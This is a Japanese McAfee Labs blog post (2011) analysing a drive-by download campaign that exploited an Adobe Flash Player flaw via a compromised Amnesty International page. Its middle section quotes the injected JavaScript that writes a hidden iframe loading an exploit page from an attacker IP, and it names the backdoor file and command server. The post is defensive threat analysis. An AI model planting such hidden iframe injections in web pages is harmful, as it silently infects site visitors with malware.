マカフィー株式会社 公式ブログ

McAfee Labs] 2011年6月 9日 更新

Adobe Flash Playerの脆弱性を狙うドライブバイダウンロード攻撃

 

3月、アドビ システムズ社がAdobe Flash Player 10.2.152.33以前のバージョンについて、脆弱性に関するセキュリティ警告を発表しました。この脆弱性を狙ったエクスプロイトは、Microsoft Excelドキュメント内に組み込まれ、被害者を悪性コードに感染させるために使用されていました。McAfee Labsは、このエクスプロイトについて詳細な技術分析を行い、Excelドキュメントに組み込まれているFlash Playerオブジェクトが、悪性シェルコードを運んでいたことを突き止めましたので報告します。

この悪性シェルコードは、その後、別のFlashオブジェクトをロードし、ヒープスプレーという従来の手法を介して脆弱性をエクスプロイトしていました。

数週間前、私たちは、危殆化したWebサーバーを介したドライブバイダウンロード攻撃を通じて、この攻撃の新たな亜種に遭遇しました。

ドライブバイダウンロード攻撃では、ユーザーは、すでに感染しているWebページにアクセスすると、不正なサーバーにリダイレクトされます。このような感染ページのほとんどは、危殆化したWebサーバー上のJavaScriptエクスプロイトに挿入された不正なインラインフレームです。結果として、このマルウェアは、ユーザーのPCに自らをインストールします。ドライブバイダウンロードは、広く知られている、ありふれた攻撃手法です。

ドライブバイダウンロードは通常、以下のように進行します。

調査中、私たちは偶然、アムネスティ・インターナショナルのウェブサイトが、ページ末にJavaScriptエクスプロイトが加えられて危殆化していることを見つけました。このページのソースは、以下のような状態でした。

この書き加えによって、ブラウザは、危殆化したサーバーのJavaScriptエクスプロイトをリクエストすることになります。さらにはここには、不正サーバーへのリンクが含まれています。

このJavaScriptエクスプロイトの中身を見るとわかるのは、組み込まれたインフレームソースが、不正なAdobe Flashファイルをダウンロードするエクスプロイトから、マルウェアをホストしているWebサーバーに、ブラウザをリダイレクトしていることです。

if(document.cookie.indexOf(‘popad’)==-1){
.var e=new Date();e.setDate(e.getDate()+1);e.setHours(0,0,0);e.setTime(e.getTime());
.document.cookie=’popad=true;path=/;expires=’+e.toGMTString();
..document.write(“<iframe frameborder=0 style=’position: absolute; top:-9999px;left:-9999px’ src=’http://71.6.217.131/dir/AI/exploit.html
width=468 height=60 scrolling=no></iframe>“);

その後、ブラウザは、このURLに接続してexploit.htmlページをダウンロードします。

このページは、私たちが調査している間もまだ健在でした。そして、コンテンツは以下のような状態でした。

このJavaScriptコードを検証して、McAfee Labsは、display.swfが、脆弱性を標的にするエクスプロイトコードを含むFlashオブジェクトであることを解明しました。このコードは、別のFlashオブジェクト内に組み込まれています。実際のバックドアバイナリは、newsvine.jp2というファイルです。脆弱性をエクスプロイトするために、Visual Basicで書かれているこのファイルがまずダウンロードされ、その後、シェルコードによって実行されます。

ブラウザは、このリクエストを出して、newsvine.jp2をダウンロードします。

新たなGETリクエストによって、Flashオブジェクトをダウンロードします。

次は、私たちがFlashオブジェクトから逆コンパイルしたFlash ActionScriptです。コード内のハイライトされている部分は、新しく組み込まれたFlashオブジェクトで、エクスプロイトコードを含んでいます。

newsvine.jp2の解析中に、私たちは、このバイナリーが中国で書かれたものかもしれないという疑いを持ちました。このファイルのリソースセクションに、2052というロケールIDがあったからです。これは、中国にマップされるものです。

swf.exeのバージョン情報には、「zchuang」という文字列が含まれています。作者の名前でしょう。

実行されると、マルウェアが、ポート80の制御サーバーjeentern.dyndns.orgへの接続を試みます。

なお、最新版をインストールしているマカフィーのお客様は、攻撃シグネチャ0x402a1700-HTTP: Adobe Flash Drive By Download Trojanの下でトロイの木馬をダウンロードするマルウェアから既に保護されています。

※本ページの内容はMcAfee Blogの抄訳です。
原文:Drive-By Downloads Attack Adobe Zero-Day Flaw

Also Find Us On

マカフィーは、インテルコーポレーション(NASDAQ:INTC)の完全子会社であり、企業、官公庁・自治体、個人ユーザーが安全にインターネットの恩恵を享受できるよう、世界中のシステム、ネットワーク、モバイルデバイスを守るプロアクティブで定評のあるセキュリティソリューションやサービスを提供しています。詳しくは、http://www.mcafee.com/jp/をご覧ください。

 

Copyright © 2003-2014 McAfee, Inc. All Rights Reserved.